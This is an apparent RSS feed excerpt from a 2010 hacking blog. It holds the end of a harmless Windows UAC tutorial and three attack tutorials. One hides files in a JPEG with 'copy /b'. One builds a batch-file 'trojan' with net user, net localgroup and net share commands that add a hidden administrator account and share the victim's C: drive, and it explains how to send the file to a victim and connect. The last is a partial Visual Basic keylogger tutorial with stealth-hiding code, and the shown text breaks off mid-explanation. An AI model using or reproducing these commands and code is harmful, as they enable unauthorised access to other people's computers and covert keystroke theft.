&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Disabled: Applications writing data to protected areas will fail.&lt;/li&gt;
&lt;/ul&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&amp;lt;/LI&amp;gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Selectively disabling User Access Control&lt;br /&gt;
&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Not all applications are marked in such a way as to trigger a User Access Control warning when executed. However, many applications need to be run with administrative rights enabled in order to function as intended. In order to accommodate this situation, you can mark an application so it runs with administrative rights each time the application is executed. To do so:&lt;/div&gt;&lt;/div&gt;&lt;ol style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Right-click the executable associated with the application.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;From the shortcut menu, choose the Properties option.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;From the Properties page, select the Compatibility tab.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Under the Privilege Level heading, select the checkbox next to “Run this program as an administrator” , as seen in Figure G.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Press OK.&lt;/li&gt;
&lt;/ol&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Figure G&lt;br /&gt;
&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a class="external" href="http://i.i.com.com/cnwk.1d/i/tr/contentPics/g_compatiblitytab.jpg" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;img alt="windows Vista user access control UAC - The Ethical Hacking" src="http://i.i.com.com/cnwk.1d/i/tr/contentPics/g_compatiblitytab.jpg" style="border-bottom-width: 1px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-width: 1px; border-style: initial; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; margin-bottom: 5px; margin-left: 0px; margin-right: 10px; margin-top: 0px; padding-bottom: 2px; padding-left: 2px; padding-right: 2px; padding-top: 2px;" title="windows Vista user access control UAC - The Ethical Hacking" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;The application’ s Compatibility tab.&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;For some applications, the “Run this program as an administrator” option may not be available. There can be a number of reasons for this:&lt;/div&gt;&lt;/div&gt;&lt;ul style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;You are not logged in as a user with administrative rights.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;The application is not capable of being run with elevated rights.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;The application is a part of the operating system. OS applications cannot be modified in this manner.&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Annoying, but worth it&lt;/strong&gt;&lt;br /&gt;
&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;User Access Control might be an annoying way to achieve system security, but it’s actually pretty welcome when it comes to maintaining system security, especially for home users. Mac and Linux users have long had to deal with the same basic security scheme, but it’s new to Windows users. Once Windows users get used to it, they’ll appreciate the added security it provides.&lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>JPEG Binding</title><link>http://0dl.blogspot.com/2010/11/jpeg-binding.html</link><category>HaCkINg</category><author>noreply@blogger.com (Unknown)</author><pubDate>Mon, 22 Nov 2010 12:11:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-4146684606597402602</guid><description>&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Do you know most of the virus that infiltrate your computer are stored secretly in a jpeg image? Well if you are not aware of this then you must read it.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;# You will need the following.. Windows 2000 / XP&lt;br /&gt;
# Basic Knowledge of the Command Prompt&lt;br /&gt;
# WinRar&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;1. Gather your image and the files you wish to lodge into it. Here I have a meeting.txt which I will hide inside my toshow.jpg.&lt;br /&gt;
2. Add the files you want to hide into a new RAR archive. (so meeting.txt.rar created newly)&lt;br /&gt;
3. Open Command Prompt and go to the folder where your files are located, e.g., ‘C:\hidden’.&lt;br /&gt;
5. At command prompt type ‘copy /b toshow.jpg + meeting.txt.rar lizard.jpg’ (without quotes).&lt;br /&gt;
(toshow.jpg is the picture I want to show, meeting.txt.rar is the file to be hidden, and lizard.jpg is the file which contains both.&lt;br /&gt;
6. Now test the lizard.jpg by double clicking it, and verifying it still opens.&lt;br /&gt;
7. Now try opening that same lizard.jpg file from menu: file-&amp;gt;open of WinRar. It will show the original hidden file meeting.txt.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Done !!!!!&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Now lizard.jpg is a simple JPEG for others, but it contains a secret file meeting.txt for you !!!!!!!!!&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Making your own trojan in a .bat fileh</title><link>http://0dl.blogspot.com/2010/11/making-your-own-trojan-in-bat-fileh.html</link><category>HaCkINg</category><author>noreply@blogger.com (Unknown)</author><pubDate>Mon, 22 Nov 2010 11:58:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-5669996793010220655</guid><description>&lt;span class="Apple-style-span" style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px;"&gt;&lt;b&gt;Open a dos prompt we will only need a dos prompt , and windows xp…&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;-Basics-&lt;br /&gt;
Opening a dos prompt -&amp;gt; Go to start and then execute and write&lt;br /&gt;
cmd and press ok&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Now insert this command: net&lt;br /&gt;
And you will get something like this&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |&lt;br /&gt;
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |&lt;br /&gt;
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Ok in this tutorial we well use 3 of the commands listed here&lt;br /&gt;
they are: net user , net share and net send&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;We will select some of those commands and put them on a .bat file.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;What is a .bat file?&lt;br /&gt;
Bat file is a piece of text that windows will execute as commands.&lt;br /&gt;
Open notepad and whrite there:&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;dir&lt;br /&gt;
pause&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;And now save this as test.bat and execute it.&lt;br /&gt;
Funny aint it ?&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;———————- Starting ——————-&lt;br /&gt;
-:Server:-&lt;br /&gt;
The plan here is to share the C: drive and make a new user&lt;br /&gt;
with administrators access&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Step one -&amp;gt; Open a dos prompt and a notebook&lt;br /&gt;
The dos prompt will help you to test if the commands are ok&lt;br /&gt;
and the notebook will be used to make the .bat file.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Command n 1-&amp;gt; net user neo /add&lt;br /&gt;
What does this do? It makes a new user called neo you can put&lt;br /&gt;
any name you whant&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Command n 2-&amp;gt; net localgroup administrators neo /add&lt;br /&gt;
This is the command that make your user go to the administrators&lt;br /&gt;
group.&lt;br /&gt;
Depending on the windows version the name will be different.&lt;br /&gt;
If you got an american version the name for the group is Administrators&lt;br /&gt;
and for the portuguese version is administradores so it’s nice&lt;br /&gt;
yo know wich version of windows xp you are going to try share.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Command n 3-&amp;gt;net share system=C:\ /unlimited&lt;br /&gt;
This commands share the C: drive with the name of system.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Nice and those are the 3 commands that you will need to put on your&lt;br /&gt;
.bat file and send to your friend.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;-!extras!-&lt;br /&gt;
Command n 4-&amp;gt; net send urip I am ur server&lt;br /&gt;
Where it says urip you will insert your ip and when the victim&lt;br /&gt;
opens the .bat it will send a message to your computer&lt;br /&gt;
and you can check the victim ip.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;-&amp;gt;To see your ip in the dos prompt put this command: ipconfig&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;———————–: Client :—————-&lt;br /&gt;
Now that your friend opened your .bat file her system have the&lt;br /&gt;
C: drive shared and a new administrator user.&lt;br /&gt;
First we need to make a session with the remote computer with&lt;br /&gt;
the net use command , you will execute these commands from your&lt;br /&gt;
dos prompt.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Command n 1 -&amp;gt; net use \\victimip neo&lt;br /&gt;
This command will make a session between you and the victim&lt;br /&gt;
Of course where it says victimip you will insert the victim ip.&lt;br /&gt;
Command n 2-&amp;gt; explorer \\victimip\system&lt;br /&gt;
And this will open a explorer windows in the share system wich is&lt;br /&gt;
the C: drive with administrators access!&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How To Write A Basic Keylogger In VB</title><link>http://0dl.blogspot.com/2010/11/how-to-write-basic-keylogger-in-vb.html</link><author>noreply@blogger.com (Unknown)</author><pubDate>Mon, 22 Nov 2010 11:57:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-862406374190882808</guid><description>&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;span style="font-family: arial, helvetica; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span class="edgeatext" style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Intro: What a Keylogger is made of&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Before we start programming, we need to answer a basic question: what is a keylogger? As the name implies (key+logger) – a keylogger is a computer program that logs (records) the keys (keyboard buttons) pressed by a user. This should be simple to understand. Lets say that I am doing something at my computer. A keylogger is also running (working) on this computer. This would mean that the keylogger is “listening” to all the keys I am pressing and it is writing all the keys to a log file of some sort. Also, as one might have guessed already, we don’t want the user to know that their keys are being logged. So this would mean that our keylogger should work relatively stealth and must not, in any case, show its presence to the user. Good, now we know what a keylogger as and we have an idea of its functions, lets move on to the next step.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;=========================================&lt;br /&gt;
Basic Concepts: What needs to be achieved&lt;br /&gt;
=========================================&lt;br /&gt;
Ok, now lets plan our program, what should such keyloger do and what it should not. Significant difference to previous section is in the sense that here we shall discuss the LOGIC, the instructions that our program will follow.&lt;br /&gt;
Keylogger will:&lt;br /&gt;
1 – listen to all the key strokes of the user.&lt;br /&gt;
2 – save these keys in a log file.&lt;br /&gt;
3 – during logging, does not reveal its presence to the user.&lt;br /&gt;
4 – keeps doing its work as long as the used is logged on regardless of users actions.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;==========================================&lt;br /&gt;
Implementation: Converting logic into code&lt;br /&gt;
==========================================&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
We shall use Visual Basic because it is much easier and simple to understand comparing to C++ or Java as far as novice audience is concerned. Although programmers consider it somewhat lame to code in VB but truthfully speaking, its the natural language for writing hacking/cracking programs. Lets cut to the chase – start your VB6 environment and we are ready to jump the ride!&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;span style="font-family: arial, helvetica; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span class="edgeatext" style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;We need a main form, which will act as HQ to the program.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;First of all, as our program shall run, we need to make sure it is hidden. This should be very simple to accomplish:&lt;br /&gt;
Private Sub Form_Load()&lt;br /&gt;
Me.Visisble = False&lt;br /&gt;
End Sub&lt;br /&gt;
This makes our program invisible to the human eye. To make it invisible to computers eye too, we need to add this line in the Form_Load() event App.TaskVisible = False . This enabled our logger to run in stealth mode and the regular Task Manager will not see our application. Although it will still be possible to see it in the processes tab, there are “ways” to make it hidden. Figure them out yourself, they have nothing to do with programming.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;OK, now that our program has run in stealth mode, it should do its essential logging task. For this, we shall be using a whole load of API. These are the interfaces that the Application Platform (windows) itself provides us in those annoying dll files.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;There are 3 methods to listen for keys:&lt;br /&gt;
* GetAsyncKeyState&lt;br /&gt;
* GetKeyboardState&lt;br /&gt;
* Windows Hooks&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Althought the last method is easier to use, this will not work on Windows98 and also it is NOT very precise. Many people use it, but as my experiences revealed, Keyboard Hooks are only a good way of blocking keys and nothing else. The most exact and precise method in my experience is GetAsyncKeyState().&lt;br /&gt;
So lets use this function, but where is that damn thing and how to use it?&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Private Declare Function GetAsyncKeyState Lib “USER32″ (ByVal vKey As Long) As Integer&lt;br /&gt;
This is how we use a function already present in a dll file. In this case we are using the user32.dll and the function we are using is GetAsyncKeyState(). The arguments (Long vKey), and return value (Long) shall be discussed later, right now its enough to know that this function can listen to keystrokes.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;What we need next is to run this function infinitely (as long as the system is running). To do this, just put a Timer control on the form and name it tmrTimer. This timer is used to run the same line of code forever. Note that a while loop with a universally true condition would also accomplish same, but the while loop will certainly hang the system and will lead to its crash as opposed to timer. Timer will not hang the system at all because a while loop tends to carry out the instruction infinitely WITHOUT any break and it also keeps the control to itself, meaning that we cannot do any other job as the loop is running (and with a universally true statement, the while loop will not let the control pass to ANYWHERE else in the program making all the code useless) while the Timer control just carries out the instuction after a set amount of time.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;So the two possibilities are:&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Do While 1=1&lt;br /&gt;
‘our use of the GAKS (GetAsyncKeyState) function Loop&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;and&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Private Sub tmrTimer_Timer()&lt;br /&gt;
‘our use of the GAKS function&lt;br /&gt;
End Sub&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Timer being set, lets move on to see how the GAKS function works and how are we going to use it. Basically what the GAKS function does is that it tells us if a specific key is being pressed or not. We can use the GAKS function like this: Hey GAKS() check if the ‘A’ key is being pressed. And the GAKS function will tell us if it is being pressed or not. Sadly, we can’t communicate with processors like this, we have to use some flamboyant 007 style&amp;nbsp;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;If GAKS(65)&amp;lt;&amp;gt;0 Then&lt;br /&gt;
Msgbox “The ‘A’ key is being pressed”&lt;br /&gt;
Else&lt;br /&gt;
Msgbox “The ‘A’ key is not being pressed”&lt;br /&gt;
End If&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;span style="font-family: arial, helvetica; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span class="edgeatext" style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;Now lets see how this code works: GAKS uses ASCII key codes and 65 is the ASCII code for ‘A’ If the ‘A’ key is being pressed then GAKS will return a non-zero value (often 1) and if the key is not being pressed then it will return 0. Hence 